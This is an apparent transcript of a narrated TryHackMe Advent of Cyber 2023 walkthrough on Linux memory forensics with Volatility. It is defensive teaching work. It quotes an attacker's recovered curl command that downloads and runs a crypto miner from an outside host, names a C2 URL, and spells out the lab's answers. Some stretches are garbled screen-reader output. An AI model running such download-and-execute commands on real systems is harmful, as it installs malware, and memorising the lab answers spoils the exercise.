Welcome. Welcome. How many welcomes can we fit in one sentence? Let's find out. Today we're doing the next task in the what is it? TryHackMe Advent of Cyber 2023 Accessibility Showcase Day what is it? 18, 19? I don't even know anymore. Let's see. Scroll down here. It is day 19. Memory forensics, crypto miners sing volatility. I don't even know what's going on anymore. We're doing all the things. Music is is that what they're doing? Volatility. Yeah, that's what they're doing. Clever, very funny. Let's turn the music down a little bit. There we go. Memory forensics today, and by golly, I have to be like praisey where praise is due. There's actual SSH details for this one. I don't have to pre-hack it, which made me very happy. So I'm glad that someone's paying attention. Yeah, we can do all the things. We can just do whatever we like. We have our SSH ready to go. We can just log into that when we're ready, which we're not yet, but we will be soon. With that having said, start the machine, and let's go read stuff, because we have stuff to read. Okay, the story. Task banner for day 19. We don't get to know what's on that image. The elves are hard at work inside Santa's Security Operations Center, SSOC, or SSOC, looking into more information about the insider thread. While analyzing the network traffic, Log McBlue discovers some suspicious traffic coming from one of the Linux database servers. Quick to act, Forensic McBlue creates a memory dump of the Linux server, along with a Linux profile, in order to start the investigation. Learning objectives. Understand what memory forensics is and how to use it in a digital forensics investigation. Understand what volatile data and memory dumps are. Learn about volatility and how it can be used to analyze a memory dump. Learn about volatility profiles. What is memory? Okay, that's all the things. We don't have headings in this one. Sad face. First phase, what is memory forensics? Memory forensics, also known as volatile memory analysis or random access memory, RAM forensics, is a branch of digital forensics. It involves the examination and analysis of a computer's volatile memory, RAM, to uncover digital evidence and artifacts related to computer security incidents, cybercrimes, and other forensic investigations. This is different from hard disk forensics, where all files on the disk can be recovered and then studied. Memory forensics focuses on the programs that were running when the memory dump was created. This type of data is volatile because it will be deleted when the computer is turned off. What is volatile data? Well, I don't get to know because I just got yanked down by the focus, by the machine coming online. I just scrolled us back. What is volatile data? In computer forensics, volatile data refers to information that is temporarily stored in a computer's memory, RAM, and can be easily lost or altered when the computer is powered off or restarted. That sounded like it came straight from Wikipedia. Volatile data is crucial for digital investigations because it provides a snapshot of the computer's state at the time of an incident. Any incident responder should be aware of what volatile data is. The reason is that when looking into a device that has been compromised, an initial reaction might be to turn off the device to contain the threat. A graphic that says Elf McBlue holding a magnifying glass. There's the magnifying glass again, and we have alt text. I appreciate this. Some examples of volatile data are running processes. I had to do it at least once. Processes, network connections, and RAM contents. Volatile data is not written to a disk and is constantly changing in memory. The issue here is that any malware will be running in memory, meaning that any network connections and running processes that spawned from the malware will be lost. Powering down the device means valuable evidence will be destroyed. What is a memory dump? A memory dump is a snapshot of memory that has been captured to perform memory analysis. It will contain data relating to running processes, captured when the memory dump was created. Benefits of memory forensics. Memory forensics offers valuable benefits in digital investigations by capturing real-time data from a computer's volatile memory. It provides rapid insight into ongoing activities, detects stealthy threats, captures volatile data like passwords, and allows investigators are gators that do a lot of investing, investigators to understand user actions and system states during incidents, all without altering the target system. In other words, memory forensics helps confirm malicious activities by analyzing a computer system's volatile memory to uncover evidence of unauthorized or malicious actions. It provides crucial insights into the attacker's tactics, techniques, and potential indicators of compromise, IOC. Another thing to keep in mind is that capturing a hard disk image of a device can be time-consuming. Then, you have to consider the problem of transferring the image, which could be hundreds of gigabytes in size. And that's before you even consider how long the analysis will take. The incident response, IR team. This is where memory analysis can really help the IR team. Capturing a memory dump from any device will be much faster and smaller. Suppose we prioritize RAM over a hard disk image. In that case, the IR team can already start analyzing the memory dump for IOCs while beginning the process of capturing an image of the hard drive. An image that just says Lottie animation, we don't get to know what's on this particular image. That's unfortunate. What are processes? McRed striking a pose. Haha. A process is an independent, self-contained unit of execution within an operating system that consists of its own program code, data, memory space, and system resources. Imagine your computer as a busy chef in a kitchen. The chef can cook multiple dishes simultaneously, but to keep things organized, they use separate cooking stations for different tasks. Each cooking station has its own ingredients, pots, and pans. These cooking stations represent what we will call processes in a computer. This is crucial in memory forensics because knowing the processes that were running during the capture of the memory dump will tell us what programs were also running at that time. Let me take a breath here. We can categorize processes into two distinct groups. Category, description. Okay, so the first category is user process. These are processes a user has started. They typically involve applications and software users interact with directly. An example is Firefox. This is a web browser that we can use to surf the web. Then there's background process. These are processes that operate within or without direct user interaction. They often perform tasks that are essential for the system's operating or for providing services to user processes. Automated backup. Backup software often runs in the background, periodically backing up data to ensure its safety and recoverability. Only now we get a connecting to the machine section. Before moving forward, view the questions in the connection card shown below. Okay, it says, what do we do today? Connection card details, start the target machine. A split screen view iframe is available for the target and credentials are provided for RDP, VNC, or SSH. Directly into the machine. Well, that's good because we like our SSHs. Start the virtual machine by pressing the Start Machine button at the top of the task. The machine will start in a split screen view. If the VM is not visible, use the blue Show Split View button at the top of the page. You may also access the VM via SSH using the credentials below. Now, let me just log into that real quick. Ubuntu and the password is volatility. All small letters. No. Alright. I'll just make sure that our little window that we have into the world of the command line is hooked into that. Where'd it go? Here it is. Ubuntu. Here's the IP. It gives us the usual, we can't establish the fingerprint thing, and the password was volatility. And there it is. Okay, beautiful. All right, what else we got? Password. Note, if your browser is not copy-paste friendly, using split view, connecting via SSH is recommended. It's always recommended because, I have problems and I don't like the in-browser machine, and I think a lot of people honestly don't. It's very convenient for newbies who don't have a machine or don't have the ability to use like their own stuff to log into things. But if you just want to do your thing and just want to use the tools that you've gotten used to, then it's really annoying to have to use an in-browser virtual machine. Anyway, let's continue. Volatility. Volatility is a command line tool that lets digital forensics and incident response teams analyze a memory dump in order to perform memory analysis. Volatility is written in Python, and it can analyze snapshots taken from Linux, macOS, and Windows. Volatility has a wide range of use cases, including the following: listing any active and closed network connections, listing a device's running processes and the time of capture, listing possible command line history values, extracting possible malicious processes for further analysis, and the list keeps on going. For this task, we'll examine the memory dump of a Linux device. For your convenience, Volatility is already installed in the VM. We can look at the different help options using vol.py/h. So the command is not Volatility, but vol.py. And I guess that has a shebang in it, so you can use it from Bash, because I don't see them doing Python 3 vol whatever. So yeah, it's vol.py-h, and we get this whole entire thing output that it says we are at version 2.6.1. That might be important later. It says a memory forensics analysis platform. We get a whole list of options with H for help, D for debug, P. We can additional plugins that we can assign. I should have drank water before I did this. There's an info that prints information about all registered objects. And the list keeps on going. Cropped for brevity. Thank you very much. Okay, note, if you want to know how volatility can be installed and call it... Oh, and all its other benefits, check out our volatility room. I appreciate that they do this now. Like, not at the end of the thing, but like you can just click on through if you want to do that first. At the time of writing, there are two versions of volatility. Volatility 2, which is built using Python 2, and Volatility 3, which uses Python 3. There are different use cases for each version, and depending on this, you might choose either one over the other. For example, Volatility 2 has been around for longer. So in some cases, it will have modules and plugins that have yet to be adapted for Volatility 3. For the purposes of this task, we're using Volatility 2. Ow, my Python. So, for the people who don't know why this is happening, essentially Python 2 and Python 3 are not really backwards compatible all the way. And Python 2 has reached end of life quite a bit of time ago, but there are people who just don't update their third-party dependencies or their modules. We see this in Screen Reader Land with the NVDA add-ons that took a while to switch over back in 2019. But it looks like Volatility is one of those projects where there's still a number of valuable modules that just are not adapted yet for Volatility 3, which, painful. But yeah, that's apparently why we're doing that. So we are using Python 2 for this, which, but okay, let's continue. Before we start analyzing the memory dump, let's go into what profiles are and how Volatility uses them. Volatility profiles. Profiles are crucial for correctly interpreting the memory dump from a target system. A profile in Volatility defines the operating system's architecture, version, and various memory specific to the target system. Using the appropriate profile is crucial because different operating systems and versions have different memory layouts and data structures. Volatility comes with many profiles for the Windows operating system, and we can verify this using vol.py-info. That is a screenshot, not a screenshot, a screen print that runs the same thing. Essentially what it says is we have profiles, Vista SP 064 here, Vista, a lot of Vista, and yeah, I cropped. Did you notice that there aren't any Linux profiles listed? Profiles for the Linux operating system have to be manually created from the same device the memory dump is from. Here are some of the reasons why we typically have to create our own Linux profile. A graphic that says McBlue holding the ever-present magnifying glass. Okay, Linux is not a single monolithic operating system, but rather a diverse ecosystem with many distributions and configurations. Each distribution may have different kernel versions, configurations, and memory layouts. This variability makes it challenging to create a one-size-fits-all profile for Linux. Unlike Windows, which has more standardized memory structures and system APIs, Linux kernel internals can vary significantly across different distributions and versions. This lack of standardization makes it difficult to create generic Linux profiles. Linux is open source, meaning its source code is readily available for inspection and modification. This leads to greater flexibility and customization, but also results in more variability in memory structures. Creating profiles is out of scope of this room, so for your convenience, a profile is already in the /home/ubuntu/desktop/evidence directory called Ubuntu _5.4.0-163-generic_profile.zip. Whew! Volatile's profile setup. Okay. Yeah, we see a CD where we list out the files, and we see that folder right there. So we have a linux.mem file and that profile file. To use the profile, we have to copy it where Volatility stores the various profiles for Linux. The command cp, the thing I just said, and it needs to be copied to home/.locale/libs/python2/site-package/volatility/plugin/overlay/linux/ will take care of this for us. Then run volpy info grepy ubuntu to confirm our profile is set. I am going to not do that and copy it from this website, because that's an awfully long thing to type. There. Yep, we're going to copy this. Gonna just paste it in here real quick. Boop. We're just going to... We're expecting... Oh, oops, something went wrong. Can I not paste in here? I cannot paste in here. Does the old trick of right-clicking work? It does. Very good. I keep forgetting this is cmd.exe and not Windows Terminal, because for some reason Windows Terminal doesn't let itself be captured in OBS for me anymore. I don't know what's happening there. But let's see, we should get just a prompt back when doing this.
CP cannot stack Ubuntu 5.4.0.163 generic profile.zip. No such file or directory. Ubuntu
fair enough. I didn't move to the correct folder yet, so we'll do desktop/evidence.
Bash cd desktop/evidence space.
Sorry, evidence is with a capital letter.
Item slash Ubuntu at volatility.
And now we copy it.
Ubuntu at volatility /desktop/evidence $CP Ubuntu 5.4. Ubuntu at volatility /desktop/evidence $.
There we go. We will run that program that they said we should run. So that's vol.py-info vertical bar grep ubuntu.
Volatility Foundation Volatility Framework 2.6.1. Linux Ubuntu 540-163 generic profile x64. A profile for Linux Ubuntu 5.4.0-163 generic profile x64. Ubuntu at volatility speech mode.
There's our profile. Fantastic. All right. Let's see. And I will, of course, when we actually start doing interesting stuff with the command line, I will switch over to that. But I figured just for printing out things we also can see on the screen here will not really be necessary. Okay, yep. Info, grep Ubuntu, and we see that same line right here. Perfect. Note, if you are curious about how to create a Linux profile, you'll find this article by Nicolas Beguier. Very helpful. Beguier. Not sure if I'm saying that right. Now we can begin our analysis. Woohoo! Memory analysis. The file linux.mem contains the memory dump of the Linux server we're going to analyze. This file is located in our home directory. For volatility to begin the analysis, we have to specify the file with the .f flag and the profile with the --profile flag. We can use the -h flag to look at all the different plugins we can use to help with our analysis. Okay, they're running vol.py-f linux.man, that dash profile equals that whole entire long string that we have, and then -h, and let's see what it says. Okay, options, yeah, the same thing we saw before, honestly. Do we see anything new here? No, it's cropped out. Okay, supported plugin commands. Linux banner, print the Linux banner information, very good. Linux bash env, Linux enumerate files, list files referenced by the file system cache, Linux find file, list and recovered files from okay, lsmod, melfind, proc dump, ps list. All the things are here, corrupt for brevity, very nice. We can see the different plugin options that we can use. Let's start with the history file. So I already don't like one of the things in this toolkit. I would love that they would just do it the way Metasploit works, where you can select a profile once and just not have to specify that every single time. Maybe there's a way to do that, but this is really annoying to just have to copy that, paste that all the time. Okay, so we can see the different plugin options that we can use. Let's start with the history file. Okay, volatility plugins, history file. The history file is a good place to start because it allows us to see whether there are any commands executed by our malicious actor while they were on this system. To examine the history file for any such commands, we can use the linux_bash plugin. The command will take a little less than a minute to finish executing. Okay. I think at this point what I'm going to do is I'm going to switch the viewport over to our actual actual command line, because this will actually be some interesting output that we want to see, and honestly it's going to take a little while for it to load while I can read more text, and I'm reading it out loud anyway, so we don't necessarily need to see the screen at the moment. There, I'm just really quickly going to make sure that my OBS isn't giving us trouble again by scanning it with AI to see that my window is showing the right thing. It should. I don't expect it to give us any more trouble this time because I tested it beforehand and it worked, but you never know. This is important to do because, you know, day 17 happened and I don't want the repeat of that if I can help it, so... Okay, let's see, what are we in? The software is displaying a terminal window. Perfect, fantastic, that's all I needed to know. Okay, so we're gonna paste this command in. Boop. Oh, I can't paste like that, I keep forgetting. Right click, there it goes. Let me press enter, and there it goes. While that happening, I'm gonna read more. Okay, we're going to skip past this bit because that's all cropped for brevity. Yeah, very cool. Blah, blah, blah. Oh, I see an interesting command. The very bottom of this thing, it says curl http:10.0.2.64/toyminer-o miner. Uh-oh. That looks interesting. Then we run miner. Okay, that's how it runs the miner. And then we do cat/home/elfie/bash history. Well then. When performing a cross-reference check with the ELF analyst who was using the server, we identify the following suspicious commands. Detective Frosto taking notes on his notebook. So we see mysql-u root-p redacted command was used by the ELF analyst but the cat/home/elfie/bash history command was not. This means the malicious actor most likely saw the MySQL command and had access to the database. There is a lot of sensitive information about the merger and the pipelines that the malicious actor could have gained access to. We also identify the curl 10.0.2.64/toyminer-o miner command, which the ELF analyst confirms they didn't use themselves. Uh-oh. This tells us that the malicious actor used curl to download the toyminer file and save it using the O parameter as a file named miner. We can also see that the malicious actor executed the miner file using the /miner command. Now that we understand what the malicious actor executed, we can look into the system's running processes. We will do that, but I can see that password has been redacted, and I want to see if we can get a flag out of it, or at least the an interesting and maybe a password that we put into a file real quick. So I'm seeing if I can find it real quick. This is that minor thing. Where's the SQL thing? ID. MySQL here. Password is a long thing. I'm going to copy that out real quick. That looks interesting.
Mode. Bash 2018 UTC plus 00 misc U root P apostrophe N space dash P tick N start marked E H X 4 V S R N 7 S V tick N NAX 4 V senior N 7 V.
Okay,
Speech mode off.
copied that. I'm going to put that in my little notepad because it might be useful later. We might have to put that into a question, so we'll see. NEHX4VSRN7SV. I'm trying to see if that's lead speak, but I don't immediately see it. Nexxav7. No, doesn't sound like a word. All right, what's next? Running processes. In memory forensics, examining running processes is a fundamental and crucial part of analyzing a system's memory dump. Analyzing running processes in memory forensics can be highly effective in identifying anomalies because it provides a baseline for what should be expected in a healthy and normal system. For example, we know that the miner program was executed, so let's see what that process looks like. To examine the running processes on the system, we can use the Linux_PS list plugin. Okay, so literally all I do is just change the last bit of that command, so we don't need to paste this. I'm just going to scroll up here.
Speech mode beeps. Speech space.
Instead of Linux_p bash, we'll do PS list, which sounds kind of like this.
Volatility Foundation Volatility Framework 2.6.1.
Give us all the information, please. Now, of course, I'm actually waiting in the command line. Last time we just let it run without having to wait for it. This does appear to go rather slowly.
Offset name pit DTB start
There it
time.
goes.
0xFFF9C9DD5 back 00 system 100.
That is a lot of
0xFF
output.
0xFFF9C9DC.
Okay.
0xFFF9C9DC23 F00 miscal server 10,291 1000 0x00000006 F160.
So yeah, this is where we probably want to see if we can find some flag or feature to make this template, the rows that it spits out, in a different order, so we don't see these offsets first, because as you can hear, that is rather distracting and slows things down. All right, so we have offset, name, PID, PPID, PPP. Okay, let's see if we see the miner. I see systemd, I see .threaded, I see RCU, GP, par, K worker. Is there anything that, for brevity? Okay, and there is MySQLD, systemd, udev, and there's miner. Okay, so miner in this particular run has, oh, you stinker. I can't see what the PSID is here because they redacted it. So I'm going to see if I can quickly get a hold of it in this actual output. Let's see. Oh, it's not so bad. Miner is 10280. Looks to be the PID. So I'm going to write that down as well. 10280. And how I did that just now is by using a Braille display. This would have been a bit of an annoying little pickle to do with speech, because like you hear the offsets off, going off first, and there's a whole bunch of hexadecimal notation in there, so you'd want to sort of skim it without really being able to skim it, and it's doable, it just takes a little while. So I had a little bit of help with the Braille display there, and I could literally cheat a little bit. But that's not an accessibility thing that TryHackMe can help. That's a volatility thing. All right. As you can see, this plugin doesn't just list each process's name, it also lists the process ID, PID, and the parent process ID, PPID. This helps determine what is often referred to as a parent-child relationship between processes. Actually, before I continue, let me see if there was a parent ID for this one too. Miner, where is miner? There is miner. So there is, yeah, there is Is that a 1 or a 1000?
Speech mode top. Minor. 10,280. 1.
1. Okay.
1,000. 1,000. 0x00 speech mode off.
So either there is no parent process or 1 is significant somehow. Let's see what it says. There are only 2 anomalies that we quickly identify. Okay, I see the minor. The ELF analyst confirmed they didn't execute the minor process. Based on the program name, our initial assumption is that we may be dealing with a crypto miner. A crypto miner, short for a cryptocurrency miner, is a computer program or hardware device used to mine cryptocurrencies. Cryptocurrencies are digital and virtual currencies that use cryptographic techniques to secure and verify transactions on a decentralized network called a blockchain. Our insider threat could be trying to use our Linux server to mine cryptocurrencies and make some extra ELF bucks. The MySQL server appears to be benign, but this is misleading. The real process is MySQL is called MSQLD, as listed above. The ELF analyst confirmed that they didn't execute this. Given that the PID of this process is different from the PPID of the miner process, this process did not spawn from the miner directly. We would like to know more about these processes. A good way to do this is by examining the binary of each process. Uh-oh. We can do just via the process extraction. Okay, well, we'll do that in a minute. Let me quickly see what the PID for the MySQL server is, because it's right here at the bottom. It's not that hard to find. It's 10291. 10291, and I'll put in brackets that it's the MySQL server. There we go. Let's see what else we get in this process extraction thing. A good way to understand what a process is doing is by extracting the binary of the process. This will help us analyze its behavior using malware analysis. We also want to extract the binary of the process as a form of evidence preservation. To extract the binary of the process for examination, we can utilize the Linux_procdump plugin. We just need to create a directory to indicate where we would like the extracted process to go with the makedir extracted command. Then we utilize the -d flag to tell volatility where to place the extracted binary and indicate the process's PID with the -p flag. Creating a separate directory doesn't just help us stay organized, it's required by volatility in order to avoid errors. Based on our file history and running processes findings, we are now going to extract the miner and MySQL server binaries using the commands shown below. Okay, we'll make that directory real quick. Boop, boop. Make dir extracted. There it is. Oh. Command not found. Oh, I misspelled make. Wow, that got scrambled. I'm not sure what happened there. MKDIR. There we go. I can type. I'm sure I can type. What the?
Speed Ubuntu at volume dry command not found. Ubuntu at volatility /desktop /evidence dollar. Ubuntu at volatility /desktop /evidence dollar extracted. Ubuntu bottom Ubuntu speech mode.
Okay, it's just behaving a little bit strange for me here, but it works now. Okay, what else do we want? What does it want us to do? What? Oh, we did something. Hang on. We need to go back here and get your extracted. We went ahead of ourselves. That's not good. Okay, we're going to extract it. Yeah, we did. All right, so we make the extract, and then we do profile. Then we say Linux procdump -d extracted -p PID, and it doesn't tell us what the PID is because it's mean. All right, so we go here. Go to this command here. We'll just remove this. We'll make it procdump. So essentially, we went up in the history to find the volatility command we've been using all this time to sort of piggyback off of. And we will give it a flag with capital D extracted. And what is it? Capital P or small p? Let's see what it wants. Small p. Okay. So small p. Small p. All right. dash P. So there was the 10280 and the 10291. So we'll do this. This will probably take a little bit because it has to go hunt the binary down. So I'll just let it do its thing and then change it later. Yep. So offset name, blah, blah, blah. And then it says extracted.minor.py. Okay, fine. And it does the same thing for the... Oh, it does list the one for the MySQL server. So I guess it doesn't think that one is super special to not mention to us. I'm just going to assume at this point that that 10280 is going to be an answer to a question later. I'm going to get the other one as well because I see it's done. 10291, there it goes. All right, in the meantime, I'm going to read what more it says. It says, we have successfully extracted the suspicious programs into the extracted folder. Having heard all of the commotion, McSkitty offers to help with the investigation by taking over the operations threat intelligence tasks. McSkitty needs the MD5 hash of each extracted binary, which we can provide with the following command. ls extracted here. Okay, and then what? MD5 sum. And then I just... Okay, the MD5 sum for both of these things. It looks like the MD5 sum is also not going to be shown here, so we're going to have to grab it. MD5 sum. And we're going to do extracted /minor. And it sounds kind of like this. It's going to be a lot.
Speech 153 of 5C84 R3B 240 E5DC 645,480D extracted /minor.10 about 153 of 5C84
And that is redacted on our page, so I'm going to just naively assume that that's going to be a question answer later as well. So I'm going to copy that into my little notepad, like I do. Bloop. All right, let's continue. The MSQL server, I don't think they care as much about. Let's see if that's redacted too. It is. So I will grab the SQL server one as well, just in case. MD5 sum extracted MySQL server. Bloop. There's the MD5 for that. Scroll. There it is. Okay, we're gonna paste it in here. Floop. All right, redacted. Everything's redacted. McSkitty striking a pose with her fists up. Aha! If I had a webcam on right now, I'd do the same pose, but it's not point because I don't have it on. It's off. In the meantime, remembering that what he learned from the Linux forensics room, Forensic McBlue wants to check for persistence mechanisms that may have been planted by the malicious actor or crypto miner. Persistence mechanisms are ways a program can survive after a system reboot. This helps malware authors retain their access to a system even if it's rebooted. Good old McBlue remembers that a command persistence tactic is via cron jobs. Yeah, we did that yesterday. While there isn't a plugin to review cron jobs, we can review them by enumerating for cron files. File extraction. As stated above, we want to look at any cron files that may have been placed by the malicious actor or crypto miner. This can help us identify if there are any persistence mechanisms at play. For example, is the MySQL server process we found before part of a persistence mechanism? But how can we enumerate files on the server? We can utilize the Linux_enumerate_files plugin to help us with this. The benefit of this plugin is to help us review any files of interest. The plugin's output will be too large, so we can utilize the grep utility to help us focus our search. All right, so we have a command here, essentially the same as we've been using before, except at this point at the end we add Linux_enumerate_files bar grep -i cron. We will run that. Find the command that we've been using. Here we are. Move this out. Linux enumerate files bar grep -I cron. Go work. While it works, we go read. Okay, it comes with a bunch of hex dumps again. Okay, so we see we have /home/cron.reboot. We have /home/cron.pid. And we have something called 679. Oh, /home/systemd/unit/invocation:cron.service. And so on and so forth, /var/spool.cron. varspool_cron.cron tabs. Oh dear, so many crons. varspool_cron tabs.elfie. Uh-oh. varspool_cron tabs.elfie. Now that looks interesting. varspool_cron/AT jobs. That assistive technology. I see user bin cron as the command itself. I see cron tab and so forth. Userlib systemd system cron.service.d, yeah, all the things. Okay. Corrupt for brevity, thank you, sir. We quickly identify the cron tab located in varspool_cron's crontab.elfie. Oh, /elfie, actually, my bad. We speak to the elf analyst who confirms they didn't have any cron jobs set up on this server. We can now extract the file by selecting the inode value, the hex-like value located to the left of the file name, and using the -O option to name our file during output. Okay, is that redacted? Let's see. I'm just looking for it here. 132687, I think, is the one they want. So I'm gonna copy. Oh.
Speed 00xfff9c 100xfff9c9.138,000/var/spool/cron/@jobs 0xfff9c9.31,650,13,246//spin/cron 00xfff9c9d78,287/var/spool/cron/tab/elfie 0x0 0x f f f 9c select 2 selected 0 selected e selected a selected space select space select space space on space selected.
I think that's correct.
Speech mode off.
But they didn't redact that, so I'm assuming they're gonna give us the full command actually. But let's find out. They say we use Linux_file_file-I. Yeah, the whole command. I'm just going to really quickly copy that bit so we have it necessarily. We have the right thing. Which means I copy this here. Okay, and that's the whole thing. Yeah, perfect. Going to go here. We'll go up here in the history, but we'll move this thing we have currently. I'm going to remove this whole entire thing because I have it on my clipboard. I'm going to paste it. So that is Linux. So yeah, the plugin is Linux_file_file-I 0xfff9. I'll just have the computer read it, honestly.
Speech FLE dash F line D N D Y F I L E I space.
The inode is
0xFFF9C E9B78280E8 space dash.
There you go.
Speech mode off.
That's the inode, and we just run that command to get the file to output. And that's going to take a little while. I'm noticing that this is taking a long time to load a lot of the time. I'm assuming that might actually be a little bit faster in Volatility 3, but we'll have to see. Okay. Elfie extracted Linux. Okay, that's fine. Go ahead and examine the contents of the Elfie file using the cat elfie command in order to understand how the MySQL server process was placed. With all the overwhelming evidence, Elf McBlue decides to move the incident following the company incident what?
Speed understands how the MySQL server with all the overwhelming evidence. Elf McBlue decides to move the incident following the company link incident response and incident management process.
Okay,
Speech mode
I'm not sure what that was. Given the nature of the incident threat, along with the current news of the acquisitions, the next question that arises from this incident is, are the pipelines safe? Oh, that's the ends of it. Oh, that's the end of the question. Okay. Well, that was a sudden end. Answer the questions below. What is the exposed password that we find from the bash history output? That is the first thing we noted down, the thing at the top here, what is it? This thing. But this means we're going to copy out our, we're going to switch back to the Chrome screen actually, because we're going to do the questions. Let me do that real quick. There. So that password is this one, I'm pretty sure. That is NEHX. Oh, big N, big E, small h, big X, 4, big V, big S, small R, big N, 7, small s, big V. And we move this quote here at the end, and that should be it. Yep, that's the correct answer. Hooray. What is the PID of the miner process that we find? 10280. That is the correct answer. What is the MD5 hash of the miner process? That's a long one. Let me copy that out. That's this whole entire thing. I'll paste it in here. Whoop. For the blind people watching, that is
5 3 5 1
A1 5 3 A
5 C 8 E F E 4 A 3 B E 2 4 0 E 5 D C 6 4 5 4 8 0 D E E space.
Ha. Well, have fun with that one. I'm not going to put it in the description because this is actually a fully accessible task, so there's no need for me to do that. Yeah, go find it yourself. You'll be fine if you're going to be doing it. Correct answer. What is the MD5 hash of the MSQL server process? We have that too. We noted that down. It's another one we have to have the screen reader spell out for us. There we go. It is
5 8 6 E 7 7 4 D B 2 A 1 7 8 1 9 D 7 F A E 1 8 D A D 7 D 1 space.
There you go. There's your 32 characters. We press enter to submit that, and it's the correct answer. Use the command strings extracted /miner PIP from question.00 grab http // What is the suspicious URL? Fully defang the URL using Cyberchef. Oh boy. So that is a bit of an issue because Cyberchef is inaccessible. So I'm going to have to assume that I know what the defang would look like. Using the command strings extracted /miner.ph. Hang on. What does it want here? Oh, string. Okay, we're using strings. Get it. Using the command strings. Gotcha. Okay. I'm going to just really quickly grab that here. Copy that. Remove this here. You need to put the right PID in, which is 10280. We're gonna paste this in here and gonna get the strings from that file. I will actually show that because that might be interesting to watch. Here. There's the command line again. We go here and we paste this command in here. So, oh yeah, we can do that. Basically what strings does is it tries to glean strings from binary programs or files. It's very helpful for static binary analysis. We're going to run that here. Oop.
Speed volatility foundation volatility framework Ubuntu at volatility Ubuntu bash Ubuntu at volatility /desktop /evidence $strings extracted /miner less 10,280 greater .0 x 400,000 grep http /bash syntax error near unexpected token 10,280 Ubuntu at
we're meant to remove the less than and greater than sign. Okay, I wasn't sure about that. Let's remove that.
Less 1 less 0280 greater Ooh, idle. Nice. User types value equals aborted x up for alt. Greater and worsening. Greater charge chunket. Bliniconic. To infact your profster event your next restlet 32 float 64 46 statka to trasajet set equals http / invalid of modulesno keynob. Greater panic. R10 R11 R12 R13 R14 R15 R8 R9 Rex RBP RBX RCX RDX refresher flags Ripper Psi RST running serial colon signal stop pets calculator with string number brand of Oxter within data equals percent QS hip skull 1111 using unaddressable value 145519152283668518064062567.
Isn't this wonderful?
Volatility / desktop / evidence
I didn't want to spare you that. Let me see if I can find it real quick though. Let's see. Overflow runtime. We may not be able to find this one depending on how hard it's going to be to defang this as well. Insufficient security level, internal lock, thread error. Where is this stupid HTTP thing?
Speech communication errors in crypto byte length overflow current time percent s is after percent stop. Not lethal instruction 6 2 limit beyond bracket is not assignable to type y not end stack pan. Unitarian lax equals stats 1111 Oxter within data epoch of mod idle ubuntu at volatility / desktop / b.
Actually, what I'm going to really quickly do is I'm going to copy this whole entire thing and search for the phrase HTTP just to get that string quickly. Did not copy it. Did not. How rude. Okay, hang on.
Speed of ref from Libria y and stack and Ethereum dash 11 left Oxter with Akab Mahu I ubuntu bash synth ubuntu b u. Start marked. Idle night. B u n. Start marked.
Oh, that's why. Okay.
And so range of minimum legal beyond y and stack dash and Ethereum lag dash 11 left Oxter Akab modula idle ubuntu at volatility b u. Start marked. Idle night. B u at. Volatility /
there we go. Okay, let me really quickly see if I can find where this is. No, it's not that one. HTTP / invalid lookup. I don't think it's that one. HTTP version, no. HTTP 2, no. HTTP status code, no. No. Oh, there's a lot of HTTP here. HTTP 2, no. And McGreedy secret c2.thm. I think that's the one. So, yep. THM, we got it. I'm gonna copy this out. Switch us back to Chrome because we need to somehow defang this. And last time I tried Cyberchef, I had no end of trouble accessibility-wise, which is extremely sad. But that's where you have it. So I'm gonna paste this in the way it is right now, so we at least have the URL because it's mighty suspicious. Here it is. Flip. / McGreedy secret.thm. Dot definitely needs to be left bracket right bracketed. But the question is that all? No, that's not all. Okay. I remember they do something with the... Let's see. Defang URL. Maybe there's another thing I can do to do this real quick. Of course, there's this. Yep. Reject all cookies. Thank you, Google. Okay, Trustify. It's in Dutch, but let's see what it does. Let's see if I can... see if we can do it. URL, here's the URL. Let's see what it does to it. Defang URL. I said defang. Defang, okay, we can actually really quickly read this. Defang is a process that modifies potentially harmful links, making them non-functional and specific, okay, non-functional and safe to share. It involves altering specific elements of the URL, such as replacing HTTP with hxxp or HTTPS with httpx, adding square brackets to domain names, or exploring other modifications. The defanged URLs remain readable for humans. Okay. Yeah, okay, so let me just change HTTP to hxxp. Maybe that's already enough. hxxp. No, not quite. Or unless actually my caps lock was on. No, there's more to it. All right. amusing is that I actually don't see the defanged URL. This one's not working for us either. We're just going to quickly... Oh, good Christ. Stop. Okay, there we go. Oh. My browser is jumping all over the place. Can you stop? There we go. Defang URL tool. Just add the word tool. Maybe that'll make Cyberchef pop up, but we'll see. Yeah, there it is. Maybe we can actually do it with Cyberchef. Let's try it again. It's been a while since we used it. Maybe they bettered their life and actually made it easier. All right. Okay, input folder open, add, oh dear. Okay, so here's the input. There. Text field raw bytes. No, I just want a defang output. All right. Contents copy, open in browser, full screen. Oh dear. Hey, can I just search for defang? Nope, of course not. Well, this is good. We're doing this so we can show off where the accessibility issues are. This is one for Cyberchef. I hope this ever gets fixed. All right, let's just see what the screen reader makes of this, because it's really not good.
Speed button, auto clickable, checkbox, button bait, button step, button delete, button folder, button save, recipe, clickable, flow control, other, multimedia, forensics, code tidy, hashing, compression, extractors, date/time, utils, language, networking, arithmetic/public key, encryption/ magic, fork, entropy, regular express URL decode. From xdump to xdump, from UR regular expression, UR from egg to x, from base 6 to base 6 button star, favorites, search, edit, operations, link option setting, search, edit.
We can search, okay, defang.
Favorites, button star, data phone encryption / data button star, data encrypt arithmetic networking, flow clickable, recipe, button save,
results,
recipe,
we
flow
can
control,
see
other,
it.
flow clickable, recipe, button save, button full, button delete, button step, button bait, checkbox checked, clickable, auto bait, clickable, input, button add, button folder open, button input, button view, clickable, edit, multi-line http / out of edit, clickable, output, button save, button content copy, button open in browser, button full, clickable, edit, multi-line http / microdiscrete, find error dialog, Cyberchef, out of step app 27, clickable, edit, multi-line http.
